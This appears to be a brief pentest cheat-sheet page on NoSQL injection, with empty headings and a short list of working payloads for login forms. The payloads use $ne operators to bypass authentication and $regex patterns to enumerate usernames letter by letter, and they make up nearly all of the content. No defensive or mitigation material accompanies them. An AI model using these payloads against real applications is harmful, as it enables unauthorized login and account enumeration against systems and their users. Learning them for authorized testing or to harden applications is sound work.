Nosql injection
Difference between sql & nosql database
Exploiting Methodology / Technique
Payloads
Last updated
Last updated
username[$ne]=abc&password[$ne]=xyz&login=login > to bypass authentication
username[$regex]=abc&password[$ne]=xyz&login=login > brute-forcing username
username[$regex]=a > checking that particular alphabets "a" come in name or not
=a > checking alphabet existence
=^a > checking the first alphabet of username
=^a.* > full-payload